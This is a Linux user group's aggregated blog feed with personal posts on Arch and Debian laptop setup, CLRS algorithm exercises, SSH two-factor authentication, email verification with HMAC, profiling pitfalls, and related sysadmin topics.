Planet LILUG

December 31, 2015

Nate Berry

Ian Murdock, founder of Debian, dead at 42 under strange circumstances

Mr. Murdock, the founder of Debian, had suddenly begun posting some very strange things on Twitter over the weekend, suggesting that he was planning suicide but also alleging police abuse. The posts seemed uncharacteristic of him, and many folks speculated that his account had been hacked.

by Nate at December 31, 2015 06:21 PM

November 10, 2015

Nate Berry

OpenELEC runs great on the Raspberry Pi2

I’ve had a Raspberry Pi2 since earlier this year when it first came out. I had gotten it in a package which included a see-through plastic case, a miniSD card pre-loaded with Noobs on it, a wifi USB dongle, USB power supply, and HDMI cable. Since I already had a wireless keyboard and mouse I […]

by Nate at November 10, 2015 02:05 AM

July 26, 2015

Eitan Adler

Pre-Interview NDAs Are Bad

I get quite a few emails from business folk asking me to interview with them or forward their request to other coders I know. Given the volume, it isn't feasible to respond affirmatively to all of these requests.

If you want to get a coder's attention there are a lot of things you could do, but there is one thing you shouldn't do: require them to sign an NDA before you interview them.

From the candidate's point of view:

  1. There are a lot more ideas than qualified candidates.
  2. It's unlikely your idea is original. That doesn't mean anyone else is working on it, just that someone else has probably thought of it.
  3. Let's say the candidate was working on a similar, if not identical, project. If the candidate doesn't continue with you, they now have to consult a lawyer to make sure you can't sue them over a project they were working on before.
  4. NDAs are hard legal documents and shouldn't be signed without consulting a lawyer. Does the candidate really want to find a lawyer before interviewing with you?
  5. An NDA puts the entire obligation on the candidate. What does the candidate get from you?
From a company founder's point of view:
  1. Everyone talks to someone about the companies they interview with. Do you want to be that strange company which made them sign an NDA? It can easily harm your reputation.
  2. NDAs do not stop leaks. They serve to create liability when a leak occurs. Do you want to be the company that sues people who interview with them?

There are some exceptions; for example, government and security jobs may require security clearance and an NDA. For most jobs it is possible to determine if a coder is qualified and a good fit without disclosing confidential company secrets.

by Eitan Adler at July 26, 2015 08:13 PM

June 16, 2015

Eitan Adler

Blogging My Way Through CLRS Section 4.1

After another long break of not writing up any CLRS answers here is section 4.1.
Question 4.1-1:

What does $\textit{Find-Maximum-Subarray}$ return when all elements of $A$ are negative?

The procedure would return the single element of maximum value. This is expected since the maximum subarray must contain at least one element. It can be seen by noting that $\textit{Find-Max-Crossing-Subarray}$ will always return the subarray consisting solely of the midpoint, and that $\textit{Find-Maximum-Subarray}$ always finds the maximum of $\{\textit{left-sum}, \textit{right-sum}, \textit{cross-sum}\}$.

Question 4.1-2:

Write pseudocode for the brute-force method of solving the maximum-subarray problem. Your solution should run in $\Theta(n^2)$ time.

max_i = nil
max_j = nil
max_sum = -∞

for i in 0..len(A):
   cur_sum = 0
   for j in i..len(A):
     cur_sum += A[j]
     if cur_sum > max_sum:
       max_sum = cur_sum
       max_i = i
       max_j = j
return (max_i, max_j, max_sum)
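The pseudocode above translates almost line for line into runnable Python; here is a sketch (the function name and the use of negative infinity as the initial sum are my choices):

```python
import math

def max_subarray_brute(A):
    """Theta(n^2) brute force: try every pair of endpoints (i, j)."""
    max_i = max_j = None
    max_sum = -math.inf
    for i in range(len(A)):
        cur_sum = 0
        for j in range(i, len(A)):
            cur_sum += A[j]  # sum of A[i..j], extended one element at a time
            if cur_sum > max_sum:
                max_sum = cur_sum
                max_i, max_j = i, j
    return (max_i, max_j, max_sum)
```

The inner loop reuses the running sum of A[i..j-1], which is what keeps the algorithm at $\Theta(n^2)$ rather than $\Theta(n^3)$.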

Question 4.1-3:

Implement both the brute-force and recursive algorithms for the maximum-subarray problem on your own computer. What problem size $n_0$ gives the crossover point at which the recursive algorithm beats the brute-force algorithm? Then, change the base case of the recursive algorithm to use the brute-force algorithm whenever the problem size is less than $n_0$. Does that change the crossover point?

This question is specific to the implementation and the computer on which it is run, so I will be skipping it in this writeup. It is worth noting, though, that changing the implementation to use the brute-force method for values less than $n_0$ is very likely to change $n_0$.

Question 4.1-4:

Suppose we change the definition of the maximum-subarray problem to allow the result to be an empty subarray, where the sum of the values of an empty subarray is 0. How would you change any of the algorithms that do not allow empty subarrays to permit an empty subarray to be the result?

For the brute-force algorithm it would be rather trivial to add a check: if the returned max_sum is negative, return the empty subarray (with sum 0) instead.

For the recursive divide-and-conquer algorithm it is sufficient to change $\textit{Find-Max-Crossing-Subarray}$ in a manner similar to the brute-force method. If $\textit{Find-Max-Crossing-Subarray}$ returns the correct value, then $\textit{Find-Maximum-Subarray}$ will do the correct thing.
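For the brute-force variant, the change amounts to one comparison after the scan. A self-contained sketch (the `(None, None, 0)` encoding of the empty subarray is my choice):

```python
import math

def max_subarray_allow_empty(A):
    """Return (start, end, sum); (None, None, 0) denotes the empty subarray."""
    best = (None, None, -math.inf)
    for i in range(len(A)):
        cur_sum = 0
        for j in range(i, len(A)):
            cur_sum += A[j]
            if cur_sum > best[2]:
                best = (i, j, cur_sum)
    # If every non-empty subarray sums to less than 0, the empty subarray wins.
    return best if best[2] >= 0 else (None, None, 0)
```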

Question 4.1-5:

Develop a nonrecursive linear-time algorithm for the maximum-subarray problem.[1]

If one knows the answer to the max-subarray problem for a given prefix of the array, then any new element presents only two cases: it is part of the maximum subarray ending at that element, or it is not. It is easier to explain with pseudocode:

max_start = 0
max_end = 0
max_sum = A[0]

cur_start = 0
max_with_j = A[0]
for j in 1..len(A):
  # Either j begins a new subarray on its own, or it extends the
  # best subarray ending at j-1.
  if A[j] >= max_with_j + A[j]:
    max_with_j = A[j]
    cur_start = j
  else:
    max_with_j = max_with_j + A[j]
  # Record a new overall maximum when the subarray ending at j beats it
  if max_with_j >= max_sum:
    max_sum = max_with_j
    max_start = cur_start
    max_end = j
return (max_start, max_end, max_sum)

  1. The question provides some hints as to the solution of the problem.
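A runnable Python sketch of this linear-time approach (function and variable names are my choices; it returns the same (start, end, sum) triple as the other algorithms):

```python
def find_maximum_subarray(A):
    """Linear-time maximum subarray (Kadane's algorithm) for non-empty A."""
    max_start, max_end, max_sum = 0, 0, A[0]
    cur_start, max_with_j = 0, A[0]
    for j in range(1, len(A)):
        # Either A[j] starts a new subarray on its own, or it extends
        # the best subarray ending at j - 1.
        if A[j] >= max_with_j + A[j]:
            max_with_j = A[j]
            cur_start = j
        else:
            max_with_j += A[j]
        # Record a new overall maximum when the subarray ending at j beats it.
        if max_with_j >= max_sum:
            max_sum = max_with_j
            max_start, max_end = cur_start, j
    return (max_start, max_end, max_sum)
```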

by Eitan Adler at June 16, 2015 02:06 AM

May 08, 2015

Nate Berry

Still using Arch on my Thinkpad T410s, but not with KDE anymore

It's been a while since I've posted anything here so just as an exercise for the fingers I thought I'd post an update about my current machine. I've been running Arch on an old Thinkpad T410s for almost a year now (journalctl says logs started on June 23, 2014). It's an Intel i5 M560 […]

by Nate at May 08, 2015 01:47 AM

March 30, 2015

Eitan Adler

FreeBSD SMB Client under OSX Host

I recently purchased a new Macbook Pro and wanted to get a FreeBSD virtual machine set up in order to continue doing development work on it. Unfortunately, FreeBSD as a guest does not support native folder sharing, so I decided to try using a samba mount.

I decided to set up my VM to have two network interfaces: a NATed interface for internet access and a host-only interface for access to SMB and ssh.

The NAT networking configuration looks like:

NetworkName: FreeBSDNatNetwork
IPv6 Enabled: Yes
IPv6 Prefix:
DHCP Enabled: Yes
Enabled: Yes
Port-forwarding (ipv4)
SSH IPv4:tcp:[]:5022:[]:22
Port-forwarding (ipv6)
FreeBSD ssh:tcp:[]:6022:[fd17:625c:f037:2:a00:27ff:fefc:9dab]:22
loopback mappings (ipv4)

The Host-Only networking configuration looks like:

Name: vboxnet0
GUID: 786f6276-656e-4074-8000-0a0027000000
DHCP: Disabled
IPV6NetworkMaskPrefixLength: 0
HardwareAddress: 0a:00:27:00:00:00
MediumType: Ethernet
Status: Up
VBoxNetworkName: HostInterfaceNetworking-vboxnet0
The FreeBSD configuration looks like this:

The OSX sharing configuration looks like:

Unfortunately, when attempting to actually mount the SMB filesystem with: mount_smbfs -I //eax@ I get the error mount_smbfs: can't get server address: syserr = Operation timed out

I tried installing the package net/samba36 and found that I needed the --signing=off flag to let it work:

Based on this setup and research, it seems that FreeBSD cannot natively mount an OSX samba share. It might be possible to use sysutils/fusefs-smbnetfs. Other people have recommended NFS or sshfs.

by Eitan Adler at March 30, 2015 03:12 AM

January 26, 2015

Nate Berry

Printing to Canon MX860 wirelessly from Arch Linux

I’ve been using Arch more often than the Ubuntu machine lately and since I know that my Canon printer is not well supported under Linux I was putting off trying to get it going under Arch. In Ubuntu I was able to use some .deb packages that were hosted on a European Canon website to […]

by Nate at January 26, 2015 03:56 AM

January 19, 2015

Nate Berry

Crontab reference

This is just a snippet of text I got from here which I keep around and paste into my crontab on any new machine I set up. If I forget to do this I invariably end up googling it again… every time. # CRONTAB REF # from # # * * * * * […]

by Nate at January 19, 2015 01:39 PM

November 15, 2014

Nate Berry

Using i3 on my Arch USB flash drive

Back in February I wrote about setting up a bootable USB stick with Arch Linux. At the time I was using it with a Dell laptop, but since then have been running it mainly off an old Thinkpad T410s (with a now totally non-functional power cable and a cracked palmrest) that had been retired from […]

by Nate at November 15, 2014 07:08 PM

September 03, 2014

Eitan Adler

Finding the majority element in a stream of numbers

Some time ago I came across the following question.
As input a finite stream of numbers is provided. Define an algorithm to find the majority element of the input. The algorithm need not provide a sensible result if no majority element exists. You may assume a transdichotomous memory model.
There are a few definitions which may not be immediately clear:
Stream
A possibly infinite sequence of data which may not be reused in either the forward or backward direction without explicitly storing it.
Majority element
An element in a set which occurs more than half the time.
Transdichotomous memory model
The integer size is equal to the word size of memory. One does not need to worry about storing partial pieces of integers in separate memory units.
Unfortunately this answer isn't of my own invention, but it is interesting and succinct.

The algorithm uses 3 registers: the accumulator, the guess, and the current element (next):
  1. Initialize accumulator to 0
  2. Accept the next element of the stream and place it into next. If there are no more elements go to step #7.
  3. If accumulator is 0 place next into guess and increment accumulator.
  4. Else if guess matches next increment accumulator
  5. Else decrement accumulator
  6. Go to step 2
  7. Return the value in guess as the result
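The steps above can be sketched in Python (this is the well-known Boyer-Moore majority vote algorithm; the names follow the three registers):

```python
def majority_element(stream):
    """One pass, O(1) extra space: accumulator, guess, and next."""
    accumulator = 0
    guess = None
    for next_item in stream:      # step 2: consume the stream
        if accumulator == 0:      # step 3: adopt a new guess
            guess = next_item
            accumulator = 1
        elif guess == next_item:  # step 4: guess matches, increment
            accumulator += 1
        else:                     # step 5: mismatch, decrement
            accumulator -= 1
    return guess                  # step 7: the majority element, if one exists
```

If no majority element exists the returned guess is arbitrary, which matches the problem statement.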

An interesting property of this algorithm is that it can be implemented in $O(n)$ time even on a single tape Turing Machine.

by Eitan Adler at September 03, 2014 12:56 AM

May 24, 2014

Nate Berry

Upgrading the Macbook to Ubuntu 14.04

While I certainly have been enjoying running Arch on usb on the Dell, my main machine is still the old MacBook running Ubuntu. I had some extra time today and thought “hey, I should install steam and grab FTL and Kerbal Space Program” but then promptly decided I'd rather do upgrades. I'm running Gnome3 not […]

by Nate at May 24, 2014 05:56 PM

February 16, 2014

Nate Berry

Arch Linux on bootable, persistent USB drive

I recently got a new laptop from work. It's a refurbished Dell Latitude E6330 with an Intel Core i5 processor, a 13″ screen and a 120GB SSD drive that came with Windows 7 Pro. I haven't used Windows regularly in quite some time (I've been using a WinXP VM on the rare occasion I need […]

by Nate at February 16, 2014 08:07 PM

November 26, 2013

Nate Berry

Increase disk size of Ubuntu guest running in VMware

A while ago I created a virtual machine (VM) under VMware 5.1 with Ubuntu as the guest OS. I wasn’t giving the task my full attention and I made a couple choices without thinking when setting this one up. The problem I ended up with is that I only allocated about 10GB to the VM […]

by Nate at November 26, 2013 03:25 AM

November 04, 2013

Eitan Adler

Two Factor Authentication for SSH (with Google Authenticator)

Two factor authentication is a method of ensuring that a user has a physical device in addition to their password when logging in to some service. This works by using a time (or counter) based code which is generated by the device and checked by the host machine. Google provides a service which allows one to use their phone as the physical device using a simple app.

This service can be easily configured and greatly increases the security of your host.

Installing Dependencies

  1. There is only one: the Google-Authenticator software itself:
    # pkg install pam_google_authenticator
  2. On older FreeBSD installations you may use:
    # pkg_add -r pam_google_authenticator
    On Debian derived systems use:
    # apt-get install libpam-google-authenticator

User configuration

Each user must run "google-authenticator" once prior to being able to log in with ssh. Running it will present a series of yes/no prompts which are fairly self-explanatory. Note that the alternative to time-based codes is counter-based codes. It is easy to lose track of which number you are at, so most people prefer time-based.
  1. $ google-authenticator
    Do you want authentication tokens to be time-based (y/n)
    Make sure to save the URL or secret key generated here as it will be required later.

Host Configuration

To enable use of Authenticator the host must be set up to use PAM which must be configured to prompt for Authenticator.
  1. Edit the file /etc/pam.d/sshd and add the following in the "auth" section prior to pam_unix:
    auth requisite
  2. Edit /etc/ssh/sshd_config and uncomment
    ChallengeResponseAuthentication yes

Reload ssh config

  1. Finally, the ssh server needs to reload its configuration:
    # service sshd reload

Configure the device

  1. Follow the instructions provided by Google to install the authentication app and setup the phone.

That is it. Try logging into your machine from a remote machine now.

Thanks bcallah for proof-reading this post.

by Eitan Adler at November 04, 2013 12:56 AM

October 05, 2013


Debian GNU / Linux on Samsung ATIV Book 9 Plus

Samsung just recently released a new piece of kit, the ATIV Book 9 Plus. It's their top-of-the-line Ultrabook. Being in the market for a new laptop, when I heard the specs I was hooked. Sure, it doesn't have the best CPU in a laptop or even an amazing amount of RAM; in that regard it's kind of run of the mill. But that was enough for me. The really amazing thing is the screen, with 3200x1800 resolution at 275 DPI. If you were to get a standalone monitor with similar resolution you'd be forking over anywhere from 50-200% of the value of the ATIV Book 9 Plus. Anyway, this is not a marketing pitch. As a GNU / Linux user, buying bleeding-edge hardware can be a bit intimidating. The problem is that it's not clear if the hardware will work without too much fuss. I couldn't find any reports of folks running GNU / Linux on it, but decided to order one anyway.

My distro of choice is Debian GNU / Linux. So when the machine arrived the first thing I did was try Debian Live. It did take some tinkering in the BIOS (press F2 on boot to enter config) to get it to boot, mostly because the BIOS UI is horrendous. In the end, disabling secure boot was pretty much all it took. Out of the box most things worked, the exceptions being Wi-Fi and brightness control. At this point I was more or less convinced that getting GNU / Linux running on it would not be too hard.

I proceeded to install Debian from the stable net-boot CD, at first with UEFI enabled but secure boot disabled. Installation went over fine, but when it came time to boot the machine it would simply not work; it looked like the boot loader wasn't starting properly. I didn't care too much about UEFI, so I disabled it completely and re-installed Debian. This time things worked and Debian Stable booted up. I tweaked /etc/apt/sources.list, switching from Stable to Testing, rebooted the machine, and noticed that on boot the screen went black. It was rather obvious that the problem was with KMS. Likely the root of the problem was the new kernel (linux-image-3.10-3-amd64) which got pulled in during the upgrade to testing. The short-term workaround is simple: disable KMS (add nomodeset to the kernel boot line in grub).

So now I had a booting base system, but there was still the problem of Wi-Fi and KMS. I installed the latest firmware-iwlwifi, which had the required firmware for the Intel Corporation Wireless 7260. However, Wi-Fi still did not work. Fortunately I came across a post on the Arch Linux wiki which states that the Wi-Fi card is only supported in Linux kernel >=3.11.

After an hour or so of tinkering with kernel configs I got the latest kernel (3.11.3) to boot with working KMS and Wi-Fi. Long story short, until Debian moves to a kernel >=3.11 you'll need to compile your own or install my custom compiled package. With the latest kernel pretty much everything on this machine works, including the things that are often tricky, like suspend, backlight control, touchscreen, and obviously Wi-Fi. The only remaining things to figure out are the volume and keyboard backlight control keys. But for now I'm making do with a software sound mixer. And the keyboard backlight can be adjusted with (values: 0-4):

echo "4" > /sys/class/leds/samsung\:\:kbd_backlight/brightness

So if you are looking to get the Samsung ATIV Book 9 Plus and wondering if it'll play nice with GNU / Linux, the answer is yes.

by dotCOMmie at October 05, 2013 08:11 PM

August 03, 2013

John Lutz

A theoretical p2p dynamic messaging and/or voting system which is open sourced for the people.

  The standard model of internet activity is client/server: one server to each client. Another paradigm, which is much less often used, is Peer to Peer (p2p).

  Peer to Peer allows each client on the internet to serve as well as receive as a client. This allows for a self-administering and self-corrective design. But what is most useful and trusted is that control is decentralized. This is good for many reasons: uptime improves, and the potential for abuse of power is *greatly* diminished.

  Some common examples of p2p in action are Bitcoin, Tor and BitTorrent. All of these p2p systems are Open Source. Open Source provides the user with the ability to compile the software themselves, and is critical in distributing control to every user involved. It also allows those black boxes called 'Apps', 'Programs', 'Systems' or 'Applications' to receive peer review, so that nothing suspicious happens without you knowing (for example, bluetooth and webcams automatically set to record and run as the default behaviour). [I have band-aids covering all my personal laptop cameras.]

  There are many services and systems provided with Apple and most notably Windows that prevent us from knowing what traffic is transmitted from our personal technological devices. Open Source allows us not only to conserve our personal information but also to extend and share what we've done with those we see fit. Open Source is equated here with Power to The People. And services such as support, administration or development can also use the monetary model. It all depends on each individual situation. The possibilities of Open Source are indeed amazing.

  There are many forms of Open Source software, but none so worldwide known as an operating system called Linux. There are, even within Linux itself, many forms modified by people and groups. I have, with mixed success, used and administrated Debian, Ubuntu, Red Hat, CentOS and SuSE. Depending on which of these or the many other publicly downloadable variations you choose, it can take as little as 25 minutes or as much as 3 days to fully install and configure these softwares and typical internet apps. You could literally change the source code (if you had a little swagger) to make them change their default behaviour.

  A p2p system in which a bulletin board system (a variation of a standard non-p2p model like phpBB or vBulletin) delivered messages with time stamps and backups to other nodes could theoretically be created along the lines of how famous p2p systems like Bitcoin operate. Except in this theoretical framework, instead of virtual currency it would be messages, votes, blogs; any kind of data. This framework would be a nonstop behemoth using potentially hundreds of thousands or even millions of clients, who themselves also act as servers. Being free from a centralized control system, in which the system changes according to the whims of the few, is vital to producing, like all good policies, a check and balance system free from tyranny.

 I would suggest that if ISPs started to ban protocol ports (for example port XXXX where X=1 to 65535) like BitTorrent's, a programmer could creatively reprogram this new theoretical p2p message system to alternate between different ports dynamically. That way each very powerful ISP could not ban the people's p2p messaging system as they have, in my case, banned BitTorrent.

 I hope you have fully understood what I have written here. If you have any more questions or would like a more in-depth explanation of what I've presented here, please let me know at @john_t_lutz on twitter, or here in this blog. Thank you.

Worldly Yours,
John Lutz

by JohnnyL at August 03, 2013 07:22 PM

February 13, 2013

Eitan Adler

Don't Use Timing Functions for Profiling

One common technique for profiling programs is to use the gettimeofday system call (with code that looks something like this):

Example (incorrect) code that uses gettimeofday:

#include <sys/time.h>
#include <stdio.h>

void function(void)
{
    struct timeval before;
    struct timeval after;
    gettimeofday(&before, NULL);
    /* ... the code being profiled ... */
    gettimeofday(&after, NULL);
    time_t delta = after.tv_sec - before.tv_sec;
    printf("elapsed: %ld seconds\n", (long)delta);
}

However, using gettimeofday(2) or time(3) or any function designed to get a time of day to obtain profiling information is wrong for many reasons:

  1. Time can go backwards. In a virtualized environment this can happen quite often. In non-virtualized environments this can happen due to time zones. Even passing CLOCK_MONOTONIC to clock_gettime(2) doesn't help, as it can go backwards during a leap second expansion.
  2. Time can change drastically for no reason. Systems with NTP enabled periodically sync their time with a time source. This can cause the system time to change by minutes, hours, or even days!
  3. These functions measure Wall Clock time. Time spent on entirely unrelated processes is going to be included in the profiling data!
  4. Even if you have disabled everything else on the system[1] the delta computed above includes both of User time and System Time. If your algorithm is very fast but the kernel has a slow implementation of some system call you won't learn much.
  5. gettimeofday relies on the CPU clock, which may differ across cores, resulting in time skew.

So what should be used instead?

There isn't a good, portable function to obtain profiling information. However, there are options for those not tied to a particular system (or those willing to maintain multiple implementations for different systems).

The getrusage(2) system call is one option for profiling data. This provides different fields for user time (ru_utime) and system time (ru_stime) at a relatively high level of precision and accuracy.
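As a sketch of the same idea from Python on Unix-like systems, the standard library exposes getrusage(2) through the resource module (the squaring loop is just a stand-in workload):

```python
import resource

# Measure user and system CPU time separately, unlike gettimeofday's wall clock.
before = resource.getrusage(resource.RUSAGE_SELF)
total = sum(i * i for i in range(200_000))  # stand-in for the code being profiled
after = resource.getrusage(resource.RUSAGE_SELF)

user_s = after.ru_utime - before.ru_utime  # seconds of user CPU time
sys_s = after.ru_stime - before.ru_stime   # seconds of system CPU time
print(f"user: {user_s:.6f}s system: {sys_s:.6f}s")
```

Because ru_utime and ru_stime only count CPU time charged to this process, unrelated system activity does not pollute the measurement.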

Using DTrace's profiling provider also seems to be a decent choice, although I have limited experience with it.

Finally, using APIs meant to access hardware-specific features such as FreeBSD's hwpmc is likely to provide the best results at the cost of being the least portable. Linux has similar features such as oprofile and perf. Using dedicated profilers such as Intel's VTune[2] may also be worthwhile.

  1. Including networking, background process swapping, cron, etc.
  2. A FreeBSD version is available.
Update 2012-11-26: Include note about clock skew across cores.
Update 2013-02-13: Update and fix a massive error I had w.r.t. clock(3)

by Eitan Adler at February 13, 2013 12:26 AM

January 20, 2013

Nate Berry

Installing Cyanogenmod on ASUS Transformer TF101

editor’s note: I’ve updated this story many times since I first posted it. For the current status, scroll all the way to the end of the story as I’ve appended update notices to the end each time I upgraded or switched Roms. Back in December, 2011 when I first got my ASUS Transformer TF101 it […]

by Nate at January 20, 2013 07:10 PM

January 11, 2013

Nate Berry

Youtube TV control from my android tablet

update 131202: I would disregard most of this post since I've picked up a chromecast which, at $35, has made queueing up Youtube, Netflix, or HBOgo videos to the TV stupid easy from the android tablet. I replaced the underpowered atom box with an Intel NUC for more serious gaming (minecraft mainly). ====================== I've got […]

by Nate at January 11, 2013 02:48 AM

January 04, 2013

Eitan Adler

Correctly Verifying an Email Address

Some services that accept email addresses want to ensure that these email addresses are valid.

There are multiple aspects to an email being valid:
  1. The address is syntactically valid.
  2. An SMTP server accepts mail for the address.
  3. A human being reads mail at the address.
  4. The address belongs to the person submitting it.

How does one verify an email address? I'll start with the wrong solutions and build up the correct one.

Possibility #0 - The Regular Expression

Discussions on a correct regular expression to parse email addresses are endless, and the proposed patterns are almost always wrong. Even really basic pattern matching such as *@*.* is wrong: it will reject the valid email address n@ai.[5]

Even a fully correct regular expression does not tell you if the mailbox is valid or reachable.

This scores 0/4 on the validity checking scale.

Possibility #1 - The VRFY Command

The oldest mechanism for verifying an email address is the VRFY mechanism in RFC821 section 4.1.1:

VERIFY (VRFY) This command asks the receiver to confirm that the argument identifies a user. If it is a user name, the full name of the user (if known) and the fully specified mailbox are returned.

However this isn't sufficient. Most SMTP servers disable this feature for security and anti-spam reasons. This feature could be used to enumerate every username on the server to perform more targeted password guessing attacks:

Both SMTP VRFY and EXPN provide means for a potential spammer to test whether the addresses on his list are valid (VRFY)... Therefore, the MTA SHOULD control who is allowed to issue these commands. This may be "on/off" or it may use access lists similar to those mentioned previously.

This feature wasn't guaranteed to be useful at the time the RFC was written:[1]

The VRFY and EXPN commands are not included in the minimum implementation (Section 4.5.1), and are not required to work across relays when they are implemented.

Finally, even if VRFY was fully implemented there is no guarantee that a human being reads the mail sent to that particular mailbox.

All of this makes VRFY useless as a validity checking mechanism so it scores 1/4 on the validity checking scale.

Possibility #2 - Sending a Probe Message

With this method you connect to a mail server and pretend to send a real mail message but cut off before sending the message content. This is wrong for the following reasons:

A system administrator that disabled VRFY has a policy of not allowing for the testing for email addresses. Therefore the ability to test the email address by sending a probe should be considered a bug and must not be used.

The system might be set up to detect signs of a probe, such as cutting off early, and may rate limit or block the sender.

In addition, the SMTP server may be temporarily down or the mailbox temporarily unavailable, but this method provides no resilience against failure. This is especially true if this mechanism is attempting to provide real-time feedback to the user after submitting a form.

This scores 1/4 on the validity checking scale.

Possibility #3 - Sending a Confirmation Mail

If one cares about whether a human is reading the mailbox, the simplest way to check is to send a confirmation mail. In the email include a link to a website (or set a special reply address) with some indication of what is being confirmed. For example, to confirm "" is valid the link might be or[2].

This method is resilient against temporary failures and forwarders. Temporary failures could be retried like a normal SMTP conversation.

This way it is unlikely that a non-human will trigger the verification email[3]. While this approach solves some of the concerns, it suffers from a fatal flaw:

It isn't secure. It is usually trivial to guess the ID number, email account, or other identifier. An attacker could sign up with someone else's email account and then go to the verification page for that user's account. It might be tempting to use a random ID, but randomness implementations are usually not secure.

This scores 3/4 on the validity checking scale.

Possibility #4 - Sending a Confirmation Mail + HMAC

The correct solution is to send a confirmation mail, but include a MAC of the identifier in the verification mechanism (reply address, or URL) as well. A MAC is a construction used to authenticate a message by combining a secret key and the message contents. One family of constructions, HMAC, is a particularly good choice. This way the url might become[4]

Remember that HMAC is a specific construction, not a naive hash. It would be wise to use a framework-native function such as PHP's hash_hmac. Failing to include a secret in the construction would make the MAC trivially defeated by brute force.

This scores 4/4 on the validity checking scale.

Closing Notes

Getting email validation right is doable, but not as trivial as many of the existing solutions make it seem.

  1. Note that RFC1123 more specifically spells out that VRFY MUST be implemented but MAY be disabled.

  2. This is not my luggage password.
  3. It is still possible for an auto-reply bot to trigger reply-based verification schemes. Bots that click every link in received email are uncommon.
  4. This is HMAC-MD5. It isn't insecure as collisions aren't important for HMAC. I chose it because it is short.
  5. n@ai is an in-use email address belonging to a person named Ian:
    %dig +short ai MX

Thank you to bd for proofreading and reviewing this blog post.

by Eitan Adler at January 04, 2013 11:40 AM

December 24, 2012

Eitan Adler

#!/bin/bash considered harmful

When one writes a shell script there are a variety of shebang lines that could be used:

• #!/bin/sh
• #!/usr/bin/env bash
• #!/bin/bash

or one of many other options.

Of these only the first two are possibly correct.

Using #!/bin/bash is wrong because:

• Sometimes bash isn't installed.
• If it is installed, it may not be in /bin.
• If it is in /bin, the user may have decided to set PATH to use a different installation of bash. Using an absolute path like this overrides the user's choices.
• bash shouldn't be used for scripts intended for portability.

If you have bash-specific code use #!/usr/bin/env bash. If you want more portable code, try using Debian's checkbashisms to find instances of non-POSIX-compliant shell scripting.

by Eitan Adler at December 24, 2012 06:17 PM

December 21, 2012

Eitan Adler

Cormen on Algorithms: Blogging my way through [1/?]

    Two of my good friends recently started reading Introduction to Algorithms by Thomas H. Cormen, et. al. Being unable to resist peer pressure I decided to follow and read along.

    I plan on blogging my way through the chapters writing my answers to the questions as I go through the book. Like most of my plans they don't always work out, but one could try.

    Here it goes!

    1.1-1: Give a real-world example in which each of the following computational problems appears: (a)Sorting, (b) Determining the best order for multiplying matrices, (c) finding the convex hull of a set of points.
    Sorting - Sorting comes up in virtually every algorithm one could think of. Everything from optimizing monetary investments to efficient compression algorithms has to sort data at some point or another. A harder question might be: Name one non-trivial algorithm that doesn't require sorting.
    Multiplying Matrices - graphics and scientific problems frequently require matrix operations.
    Convex Hull - Collision detection for use in games, modeling biological systems, or other related work could make use of this
    1.1-2: Other than speed what other measures of efficiency might one use in a real-world setting?
    It is possible to optimize for (and against) every limited resource. For example minimizing the amount of memory usage is important for embedded applications (and desktop ones too). Reducing total disk I/O is important to increase the longevity of hard drives. On a less technical note optimizing for monetary cost or man hours expended is important too.
    1.1-3: Select a data structure you have seen previously and discuss its strengths and limitations
    One of the most interesting data structures I know is the Bloom Filter. It is a probabilistic data structure that can determine definitively that an element is NOT in a set, but can't determine definitively that an element IS in the set. It works by hashing each element of the set to a fixed-size bit array and ORing that hash into the filter, which starts as all zeros. One can test whether an element is in the set by generating its hash and checking that every bit set to 1 in the queried element's hash is also set to 1 in the filter. If so, then you have some degree of confidence that the element is in the set. Any negative means that what you are querying for has not been added.
    While most probabilistic structures have certain properties in common, bloom filters have a number of interesting pros and cons.
    1. A negative result is definitive - if a query returns that an element has not been added then one knows this to be 100% true.
    2. Since hashes are fixed size the amount of memory a Bloom Filter uses is known and bounded.
    3. Bloom filters can quickly become useless with large amounts of data. It is possible that every bit will be set to 1 which effectively makes the query a NOP.
    4. It is impossible to remove data from a bloom filter. One can't just set all the bits of the hash to a zero because that might be removing other elements as well.
    5. Without a second set of data there is no way to deterministically list all elements (unlike other probabilistic data structures such as Skip Lists).
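    The filter described above can be sketched in a few lines of Python (a toy for illustration: the salted-SHA-256 hashing, the sizes, and the class name are my own choices, not anything from the post):

```python
import hashlib

class BloomFilter:
    def __init__(self, num_bits=1024, num_hashes=3):
        self.num_bits = num_bits
        self.num_hashes = num_hashes
        self.bits = 0  # the filter starts as all zeros

    def _positions(self, item):
        # Derive k bit positions from salted digests of the item.
        for salt in range(self.num_hashes):
            digest = hashlib.sha256(f"{salt}:{item}".encode()).digest()
            yield int.from_bytes(digest[:8], "big") % self.num_bits

    def add(self, item):
        for pos in self._positions(item):
            self.bits |= 1 << pos  # OR the element's bits into the filter

    def might_contain(self, item):
        # False is definitive; True only means "probably present".
        return all(self.bits & (1 << pos) for pos in self._positions(item))

bf = BloomFilter()
bf.add("alice")
print(bf.might_contain("alice"))   # True
print(bf.might_contain("mallory")) # almost certainly False
```

    Note how con #3 above shows up here: as more elements are added, more of `bits` becomes 1 and `might_contain` returns True for everything.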
    1.1-4: How are the shortest path and traveling salesmen problems similar? How are they different?
    The shortest path problem is:
    Given a weighted (undirected) graph $G$, a start vertex $V_0$, and an end vertex $V_e$, find a path between $V_0$ and $V_e$ such that the sum of the weights is minimized. This could be expanded to: given a weighted graph $G$, find a path between every pair of vertices such that the sum of the weights for each path is minimized.
    Traveling salesman is defined as:
    Given a weighted, undirected graph $G$ and a start vertex $V_0$, find a path starting and ending at $V_0$ such that it passes through every other vertex exactly once and the sum of the weights is minimized.
    The traveling salesman problem might make use of the shortest path problem repeatedly in order to come up with the correct solution.
    1.1-5: Come up with a real-world problem in which only the best solution will do. Then come up with a problem in which a solution that is "approximately" the best will do?
    There are very few problems where one needs the objectively optimal solution. Mathematical questions are the only problems I could think of that need that level of accuracy. Virtually every problem needs a good enough solution. Some examples include finding a fast route for packets on the internet or locating a piece of data in a database.
    update 2011-06-30: modified text of answers 1.1-3 and 1.1-5 to be more clear.

    by Eitan Adler at December 21, 2012 09:14 AM

    November 22, 2012

    Nate Berry

    Warcraft III on Ubuntu 12.04

    Installing Ubuntu on the MacBook recently, I knew there would be a bunch of OSX programs I would no longer be able to run but I was pretty confident that I’d be able to get some Windows programs going with wine. Having had good luck with Temple of Elemental Evil on the Elitebook last December, […]

    by Nate at November 22, 2012 01:51 AM

    October 31, 2012

    Eitan Adler

    Finding the min and max in 1.5n comparisons

    A friend of mine recently gave me the following problem:

    Given an unsorted set of numbers, find the minimum and maximum of the set using at most $1.5n$ comparisons.

    My answer involves splitting the list up pairwise and then finding each result using only half of the set.

